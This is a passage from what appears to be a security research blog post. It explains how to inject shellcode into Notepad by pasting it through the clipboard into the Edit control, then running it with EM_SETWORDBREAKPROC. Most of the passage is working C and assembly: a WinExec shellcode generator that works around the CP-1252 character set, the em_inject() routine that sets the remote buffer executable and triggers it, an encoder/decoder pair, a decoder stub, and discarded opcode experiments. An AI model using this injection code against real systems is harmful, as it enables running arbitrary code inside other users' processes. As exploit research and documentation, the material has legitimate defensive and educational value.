      /* 0009 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 000C */ "\x59"                 /* pop rcx                       */
      /* 000D */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0010 */ "\x59"                 /* pop rcx                       */
      /* 0011 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0014 */ "\x59"                 /* pop rcx                       */
      /* 0015 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov eax, 0xff004d00           */
      /* 001D */ "\x00\xe1"             /* add cl, ah                    */
      /* 001F */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0022 */ "\x51"                 /* push rcx                      */
      /* 0023 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0026 */ "\x58"                 /* pop rax                       */
      /* 0027 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 002A */ "\xc6\x00\xc3"         /* mov byte [rax], 0xc3          */
      /* 002D */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0030 */ "\x59"                 /* pop rcx                       */
      /* 0031 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0034 */ "\x5b"                 /* pop rbx                       */
      /* 0035 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0038 */ "\x5e"                 /* pop rsi                       */
      /* 0039 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 003C */ "\x5f"                 /* pop rdi                       */
      /* 003D */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0040 */ "\x59"                 /* pop rcx                       */
      /* 0041 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0044 */ "\x6a\x00"             /* push 0                        */
      /* 0046 */ "\x58"                 /* pop rax                       */
      /* 0047 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 004A */ "\x5c"                 /* pop rsp                       */
      /* 004B */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 004E */ "\x5d"                 /* pop rbp                       */
    };

    static u8* cp1252_generate_winexec(int pid, int *cslen) {
      int     i, ofs, outlen;
      u8      *cs, *out;
      HMODULE m;
      w64_t   addr;

      // it won't exceed 512 bytes
      cs = (u8*)VirtualAlloc(
        NULL, 4096,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
      if(cs == NULL) return NULL;
      out = cs;

      // initialize parameters for WinExec()
      memcpy(out, CALC3, CALC3_SIZE);
      out += CALC3_SIZE;

      // initialize RDI for writing
      memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
      out += STORE_ADDR_SIZE;

      // ***********************************
      // store kernel32!WinExec on stack
      m = GetModuleHandle("kernel32");
      addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
      m = GetProcessModuleHandle(pid, "kernel32.dll");
      addr.q += (ULONG_PTR)m;

      for(i=0; i<MAX_ADDR; i++) {
        // load a byte into AH
        memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
        out[2] = addr.b[i];

        // if byte not allowed for CP1252, add 32
        if(!is_cp1252_allowed(out[2])) {
          out[2] += 32;
          // subtract 32 from byte at runtime
          memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
          out += SUB_BYTE_SIZE;
        }
        out += LOAD_BYTE_SIZE;
        // store AH in [RDI], increment RDI
        memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
        out += STORE_BYTE_SIZE;
      }

      // calculate length of constructed code
      ofs = (int)(out - (u8*)cs) + 2;

      // first offset
      cs[RET_OFS] = (uint8_t)ofs;

      memcpy(out, RET, RET_SIZE);
      out += RET_SIZE;

      memcpy(out, CALC4, CALC4_SIZE);

      // second offset
      ofs = CALC4_SIZE;
      ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
      out += CALC4_SIZE;

      outlen = ((int)(out - (u8*)cs) + 1) & -2;

      // convert to ascii
      for(i=0; i<=outlen; i+=2) {
        cs[i/2] = cs[i];
      }

      *cslen = outlen / 2;

      // return pointer to code
      return cs;
    }
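Two ideas in the generator are worth isolating: the address of WinExec in the target is the remote module base plus the function's offset inside the local copy of the module, and any address byte that can't survive the conversion is loaded as byte + 32 and corrected at runtime with a SUB. The sketch below models both in portable C. `byte_allowed` repeats the test from is_cp1252_allowed(), while `rebase` and `encode_addr_byte` are names invented here.

```c
#include <assert.h>
#include <stdint.h>

// Same test as is_cp1252_allowed() in the listing above.
int byte_allowed(uint8_t b) {
    if (b == 0) return 0;
    if (b >= 0x80 && b <= 0x8C) return 0;
    if (b >= 0x91 && b <= 0x9C) return 0;
    return b != 0x8E && b != 0x9E && b != 0x9F;
}

// Address of a function in another process, given where the same module
// is loaded locally and remotely.
uint64_t rebase(uint64_t local_fn, uint64_t local_base, uint64_t remote_base) {
    return remote_base + (local_fn - local_base);
}

// Value to place in the MOV EAX immediate for one address byte.
// *needs_sub is set when the generated code must subtract 32 at runtime.
uint8_t encode_addr_byte(uint8_t b, int *needs_sub) {
    *needs_sub = !byte_allowed(b);
    return *needs_sub ? (uint8_t)(b + 32) : b;
}
```

Adding 32 is enough because every disallowed byte, including zero, lands on an allowed one: 0x00 becomes 0x20 and the 0x80 to 0x9F block moves to 0xA0 to 0xBF.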
The following steps are used.
    BOOL em_inject(void) {
        HWND   npw, ecw;
        w64_t  emh, lastbuf, embuf;
        SIZE_T rd;
        HANDLE hp;
        DWORD  pid, old;
        int    cslen;
        BOOL   r;
        PBYTE  cs;
        char   buf[1024];

        // get window handle for notepad class
        npw = FindWindow("Notepad", NULL);
        if(npw == NULL) return FALSE;

        // get window handle for edit control
        ecw = FindWindowEx(npw, NULL, "Edit", NULL);
        if(ecw == NULL) return FALSE;

        // get the EM handle for the edit control
        emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);

        // get the process id for the window
        GetWindowThreadProcessId(ecw, &pid);

        // open the process for reading and changing memory permissions
        hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);
        if(hp == NULL) return FALSE;

        // copy some test data to the clipboard
        memset(buf, 0x4d, sizeof(buf));
        CopyToClipboard(CF_TEXT, buf, sizeof(buf));

        // loop until target buffer address is stable
        lastbuf.p = NULL;
        r = FALSE;

        for(;;) {
          // read the address of input buffer
          ReadProcessMemory(hp, emh.p,
            &embuf.p, sizeof(ULONG_PTR), &rd);

          // Address hasn't changed? exit loop
          if(embuf.p == lastbuf.p) {
            r = TRUE;
            break;
          }
          // save this address
          lastbuf.p = embuf.p;

          // clear the contents of edit control
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);

          // send the WM_PASTE message to the edit control
          // allow notepad some time to read the data from clipboard
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);
        }

        if(r) {
          // set buffer to RWX
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);

          // generate shellcode and copy to clipboard
          cs = cp1252_generate_winexec(pid, &cslen);
          CopyToClipboard(CF_TEXT, cs, cslen);

          // clear buffer and inject shellcode
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);

          // set the word break procedure to address of shellcode and execute
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
          SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);

          // set buffer to RW
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
        }
        CloseHandle(hp);
        return r;
    }
Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.
Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.
    // encode raw data to CP-1252 compatible data
    static void cp1252_encode(FILE *in, FILE *out) {
        uint8_t c;

        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if the result of c + 1 is disallowed
          if(!is_decoder_allowed(c + 1)) {
            // write escape code
            putc(0x01, out);
            // save byte XOR'd with the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte plus 1
            putc(c + 1, out);
          }
        }
    }
    // decode data processed with cp1252_encode to their original values
    static void cp1252_decode(FILE *in, FILE *out) {
        uint8_t c;

        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if this is an escape code
          if(c == 0x01) {
            // read next byte
            c = getc(in);
            // XOR the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte minus one
            putc(c - 1, out);
          }
        }
    }
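The scheme can be exercised on memory buffers to confirm that it round-trips every byte value. The version below is a sketch under a few assumptions: is_decoder_allowed() isn't shown in this post, so `decoder_allowed` is a guess that rejects the CP-1252 bad bytes, the null byte and the escape code itself; the key is 0x4D, as used by the assembly decoder; and `encode_buf` and `decode_buf` are illustrative names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CP1252_KEY 0x4D   // same key as the assembly decoder
#define ESCAPE     0x01

// Hypothetical stand-in for is_decoder_allowed().
int decoder_allowed(uint8_t b) {
    if (b == 0x00 || b == ESCAPE) return 0;
    if (b >= 0x80 && b <= 0x8C) return 0;
    if (b >= 0x91 && b <= 0x9C) return 0;
    return b != 0x8E && b != 0x9E && b != 0x9F;
}

// Encodes len bytes; out must hold up to 2 * len bytes.
// Returns the number of bytes written.
size_t encode_buf(const uint8_t *in, size_t len, uint8_t *out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t plus1 = (uint8_t)(in[i] + 1);
        if (decoder_allowed(plus1)) {
            out[n++] = plus1;                          // byte plus 1
        } else {
            out[n++] = ESCAPE;                         // escape code
            out[n++] = (uint8_t)(in[i] ^ CP1252_KEY);  // byte XOR key
        }
    }
    return n;
}

// Reverses encode_buf(). Returns the number of decoded bytes.
size_t decode_buf(const uint8_t *in, size_t len, uint8_t *out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (in[i] == ESCAPE && i + 1 < len) {
            out[n++] = (uint8_t)(in[++i] ^ CP1252_KEY);
        } else {
            out[n++] = (uint8_t)(in[i] - 1);
        }
    }
    return n;
}
```

With this choice of allowed bytes, 30 of the 256 possible values need the two-byte escape form, so the worst-case expansion is a doubling and typical data grows far less.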
The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.
    ; cp1252 decoder in 40 bytes of x86/amd64 assembly
    ; presumes to be executing in RWX memory
    ; needs stack allocation if executing from RX memory
    ;
    ; odzhan

        bits 32

        %define CP1252_KEY 0x4D

        jmp    init_decode       ; read the program counter

        ; esi = source
        ; edi = destination
        ; ecx = length
    decode_bytes:
        lodsb                    ; read a byte
        dec    al                ; c - 1
        jnz    save_byte
        lodsb                    ; skip null byte
        lodsb                    ; read next byte
        xor    al, CP1252_KEY    ; c ^= CP1252_KEY
    save_byte:
        stosb                    ; save in buffer
        lodsb                    ; skip null byte
        loop   decode_bytes
        ret
    load_data:
        pop    esi               ; esi = start of data
        ; **********************
        ; decode the 32-bit length
    read_len:
        push   0                 ; len = 0
        push   esp               ;
        pop    edi               ; edi = &len
        push   4                 ; 32-bits
        pop    ecx
        call   decode_bytes
        pop    ecx               ; ecx = len
        ; **********************
        ; decode remainder of data
        push   esi               ;
        pop    edi               ; edi = encoded data
        push   esi               ; save address for RET
        jmp    decode_bytes
    init_decode:
        call   load_data
        ; CP1252 encoded data goes here..
The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.
I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.
List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.
What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.
The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.
"\xb0\x00" /* mov al, 0 */ "\x00\x4d\x00" /* add byte [ebp], cl */ "\xb4\x00" /* mov ah, 0 */ "\x00\x4d\x00" /* add byte [ebp], cl */ "\x98" /* cwde */
Another idea for setting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.
"\xf8" /* clc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1d\x00\xff\x00\xff" /* sbb eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
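The interaction between the padding instruction and SBB can be modelled in a few lines. The sketch below tracks only the Carry Flag and the byte RBP points to; `add8_carry`, `sbb32` and `clc_mov_sbb` are names made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>

// Carry Flag produced by ADD BYTE [RBP], CL.
int add8_carry(uint8_t mem, uint8_t cl) {
    return ((unsigned)mem + (unsigned)cl) > 0xFF;
}

// Result of SBB EAX, imm32 for a given incoming Carry Flag.
uint32_t sbb32(uint32_t eax, uint32_t imm, int cf) {
    return eax - imm - (uint32_t)cf;
}

// CLC / ADD [RBP], CL / MOV EAX / ADD [RBP], CL / SBB EAX.
// The flag cleared by CLC is overwritten twice before SBB reads it.
uint32_t clc_mov_sbb(uint8_t mem, uint8_t cl) {
    int cf;
    mem = (uint8_t)(mem + cl);      // first padding ADD, right after CLC
    cf  = add8_carry(mem, cl);      // second padding ADD, just before SBB
    return sbb32(0xFF00FF00u, 0xFF00FF00u, cf);
}
```

When the byte at [RBP] is small the sequence happens to return 0, but once the second ADD wraps past 0xFF the result flips to 0xFFFFFFFF.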
An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.
"\xf9" /* stc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1d\x00\xff\x00\xff" /* sbb eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.
"\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xf9" /* stc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x14\x00" /* adc al, 0 */
Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is that 0x99 converts to a double byte encoding, as does the 0x92 used for the swap.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x1f" /* rol dword [rax], 0x1f */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x99" /* cdq */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x92" /* xchg eax, edx */
I examined various ways to simulate instructions and concluded it could only work using self-modifying code. The idea was to use boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There are no JMP, Jcc or CALL instructions that can be used directly.
If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.
"\x39\xd8" /* cmp eax, ebx */
There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB overwrite the Carry Flag and generate the wrong result.
"\x50" /* push rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5e" /* pop rsi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x53" /* push rbx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xa7" /* cmpsd */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1c\x00" /* sbb al, 0 */ "\x50" /* push rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x18" /* rol dword ptr [rax], 0x18 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */
Load 0xFF000700 into EAX, which leaves 0x07 in AH. SAHF copies AH into the flags, and because bit 0 of 0x07 is set, the Carry Flag (CF) is set. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 (0xFFFFFFFF).
"\xb8\x00\x07\x00\xff" /* mov eax, 0xff000700 */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x9e" /* sahf */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x1d\x00\x07\x00\xff" /* sbb eax, 0xff000700 */
"\x00\x4d\x00" /* add byte [rbp], cl */
Two problems: SAHF is a byte we can’t use (0x9E), and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored at the address in RBP and the value of CL.
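The flag dependency can be modelled in a few lines of C. This is only a sketch of the arithmetic, not shellcode: the helper names `sbb32`, `cf_after_add8` and `eax_after_snippet` are hypothetical, and the model assumes SAHF were usable and looks only at the last ADD before SBB, since that is the one that decides CF.

```c
#include <assert.h>
#include <stdint.h>

/* SBB EAX, imm32 computes EAX - imm32 - CF, modulo 2^32. */
static uint32_t sbb32(uint32_t eax, uint32_t imm, unsigned cf)
{
    assert(cf <= 1);              /* CF is a single bit */
    return eax - imm - cf;
}

/* CF left behind by ADD BYTE [RBP], CL: set when the 8-bit sum carries out.
   `mem` is the byte at [RBP] immediately before the ADD executes. */
static unsigned cf_after_add8(uint8_t mem, uint8_t cl)
{
    return ((unsigned)mem + (unsigned)cl) > 0xFFu;
}

/* EAX after MOV EAX, 0xFF000700 / SAHF / ADD BYTE [RBP], CL / SBB EAX, 0xFF000700.
   The CF set by SAHF is overwritten by the ADD, so only the ADD decides the result. */
static uint32_t eax_after_snippet(uint8_t mem, uint8_t cl)
{
    return sbb32(0xFF000700u, 0xFF000700u, cf_after_add8(mem, cl));
}
```

With `mem = 0xFF` and `cl = 1` the ADD carries and EAX ends up as -1; with `mem = 0x10` and `cl = 1` it does not, and EAX ends up as 0.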
Adding -1 subtracts 1 from the variable whose address is in RAX.
"\x6a\x00" /* push 0 */
"\x54" /* push rsp */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x58" /* pop rax */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x83\x00\xff" /* add dword [rax], -1 */
"\x58" /* pop rax */
"\x00\x4d\x00" /* add byte [rbp], cl */
Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.
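To check candidate opcodes before trying them, a small lookup of the CP-1252 range 0x80..0x9F is enough. The sketch below is not part of the PoC; the function names are hypothetical, and it assumes the five bytes CP-1252 leaves undefined (0x81, 0x8D, 0x8F, 0x90, 0x9D) are converted to the C1 control code of the same value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Code points for CP-1252 bytes 0x80..0x9F. The five undefined bytes are
   assumed to map to the C1 control of the same value. */
static const uint16_t cp1252_high[32] = {
    0x20AC, 0x0081, 0x201A, 0x0192, 0x201E, 0x2026, 0x2020, 0x2021,
    0x02C6, 0x2030, 0x0160, 0x2039, 0x0152, 0x008D, 0x017D, 0x008F,
    0x0090, 0x2018, 0x2019, 0x201C, 0x201D, 0x2022, 0x2013, 0x2014,
    0x02DC, 0x2122, 0x0161, 0x203A, 0x0153, 0x009D, 0x017E, 0x0178
};

/* UTF-16 code unit produced for a single CP-1252 byte. */
static uint16_t cp1252_to_utf16(uint8_t b)
{
    return (b >= 0x80 && b <= 0x9F) ? cp1252_high[b - 0x80] : b;
}

/* A byte survives when its UTF-16 form is the byte itself followed by 0x00. */
static int byte_survives(uint8_t b)
{
    return cp1252_to_utf16(b) <= 0x00FF;
}

/* Index of the first byte of the ANSI input that would be mangled, or -1. */
static long first_mangled(const uint8_t *ansi, size_t len)
{
    assert(ansi != NULL || len == 0);
    for (size_t i = 0; i < len; i++)
        if (!byte_survives(ansi[i]))
            return (long)i;
    return -1;
}
```

Under this mapping 0x83 becomes U+0192, 0x99 becomes U+2122 and 0x9E becomes U+017E, which is why the ADD, CDQ and SAHF encodings in these experiments are rejected.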
Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into RDI. Store AL in the variable four times before loading it into RAX. Doesn’t work once the addition after STC is executed.
"\xf9" /* stc */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x1c\x00" /* sbb al, 0 */
"\x6a\x00" /* push 0 */
"\x54" /* push rsp */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x5f" /* pop rdi */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\xaa" /* stosb */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\xaa" /* stosb */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\xaa" /* stosb */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\xaa" /* stosb */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x58" /* pop rax */
"\x00\x4d\x00" /* add byte [rbp], cl */
The next snippet simply copies the value of RCX to RAX. It’s overcomplicated, and while the POP QWORD instruction might be useful in some scenario, I just didn’t find it useful.
"\x6a\x00" /* push 0 */
"\x54" /* push rsp */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x58" /* pop rax */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x51" /* push rcx */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x8f\x00" /* pop qword [rax] */
"\x00\x4d\x00" /* add byte [rbp], cl */
"\x58" /* pop rax */
Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32 bits of the corresponding 64-bit register, so ADD and SUB on 32-bit registers aren’t useful for performing addition and subtraction on addresses.
push 0
pop rcx
xnop
push rbp ; save rbp
xnop
; 1. ====================================
push 0 ; store 0 as X
push rsp ; store &X
xnop
pop rbp ; load &X
xnop
; 2. ====================================
mov eax, 0xFF001200 ; load 0xFF001200
add [rbp], ah ; add 0x12
adc al, 0 ; AL = CF
push rbp ; store &X
xnop
push rsp ; store &&X
xnop
pop rax ; load &&X
xnop
inc dword[rax] ; &X++
pop rbp
xnop
add [rbp], al ; add CF
; 3. ====================================
Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, the address of table 2 is in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero, because anything that uses it requires a REX prefix. I’m leaving it here in case R8 is already zero.
; read byte from table 2
lodsb
add [rbp], cl
add byte[rax+r8+1], al ; copy to table 1
add [rbp], cl
lodsb
add [rbp], cl
add byte[rax+r8+3], al
add [rbp], cl
lodsb
add [rbp], cl
add byte[rax+r8+5], al
add [rbp], cl
; and so on..
; execute
push rax
ret
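The intended effect of the two-table idea can be sketched in C. This models only the data movement, not the register usage of the listing, and it rests on an assumption: table 1 holds the even bytes at even offsets with 0x00 in every odd slot, so adding a byte from table 2 into a slot is the same as storing it. The name `merge_tables` is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fill the odd offsets of table1 by adding successive bytes of table2.
   len is the total length of table1 and must be even;
   table2 must hold len / 2 bytes. */
static void merge_tables(uint8_t *table1, size_t len, const uint8_t *table2)
{
    assert(table1 != NULL && table2 != NULL);
    assert(len % 2 == 0);
    for (size_t i = 1, j = 0; i < len; i += 2, j++) {
        /* lodsb ; add byte [rax+r8+i], al */
        table1[i] = (uint8_t)(table1[i] + table2[j]);
    }
}
```

For example, a table 1 of `31 00 C3 00` combined with a table 2 of `C0 90` yields `31 C0 C3 90`.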
The same instruction can be used to add an 8-bit value to a 32-bit word.
; step 1
push rax ; save pointer
add byte[rbp], cl
add byte[rax+r8], bl ; A[0] += B[0]
mov al, 0
adc al, 0 ; set carry
add byte[rbp], cl
push rax ; save carry
add byte[rbp], cl
pop rcx ; load carry into CL
add byte[rbp], cl
pop rax ; restore pointer
add byte[rbp], cl

; step 2
push rax ; save pointer
add byte[rbp], cl
rol dword[rax], 24
add byte[rbp], cl
add byte[rax+r8], cl ; A[1] += CF
mov al, 0
adc al, 0 ; set carry
add byte[rbp], cl
push rax ; save carry
add byte[rbp], cl
pop rcx ; load carry into CL
add byte[rbp], cl
pop rax ; restore pointer
add byte[rbp], cl

; step 3
push rax ; save pointer
add byte[rbp], cl
rol dword[rax], 24
add byte[rbp], cl
add byte[rax+r8], cl ; A[2] += CF
mov al, 0
adc al, 0 ; set carry
add byte[rbp], cl
push rax ; save carry
add byte[rbp], cl
pop rcx ; load carry into CL
add byte[rbp], cl
pop rax ; restore pointer
add byte[rbp], cl

; step 4
push rax ; save pointer
add byte[rbp], cl
rol dword[rax], 24
add byte[rbp], cl
add byte[rax+r8], cl ; A[3] += CF
mov al, 0
adc al, 0 ; set carry
add byte[rbp], cl
push rax ; save carry
add byte[rbp], cl
pop rcx ; load carry into CL
add byte[rbp], cl
pop rax ; restore pointer
add byte[rbp], cl

; step 5
rol dword[rax], 24
add byte[rbp], cl
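What the five steps are meant to compute can be written as a short C model. It is a sketch of the intended arithmetic only and ignores the interleaved `add byte[rbp], cl` instructions, which in the real code would disturb CF; `rol32` and `add8_to_32` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (0 < n < 32), like ROL r/m32, imm8. */
static uint32_t rol32(uint32_t v, unsigned n)
{
    assert(n > 0 && n < 32);
    return (v << n) | (v >> (32 - n));
}

/* Add an 8-bit value to a 32-bit word using only byte additions.
   Each round adds to the low byte, keeps the carry as the next addend,
   then rotates left by 24 so the next byte moves into the low position.
   Four rotations of 24 bits restore the original byte order. */
static uint32_t add8_to_32(uint32_t a, uint8_t b)
{
    uint8_t addend = b;
    for (int step = 0; step < 4; step++) {
        unsigned sum = (a & 0xFFu) + addend;     /* add byte [rax+r8], bl/cl */
        a = (a & 0xFFFFFF00u) | (sum & 0xFFu);
        addend = (uint8_t)(sum >> 8);            /* mov al, 0 ; adc al, 0    */
        a = rol32(a, 24);                        /* rol dword [rax], 24      */
    }
    return a;
}
```

The result equals `a + b` modulo 2^32, so `add8_to_32(0x000000FF, 1)` gives 0x00000100 and `add8_to_32(0xFFFFFFFF, 1)` wraps to 0.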
As you can see, it’s a mess to try to simulate instructions instead of just writing the code to memory and executing it that way…or using CF_UNICODETEXT for copying to the clipboard. 😉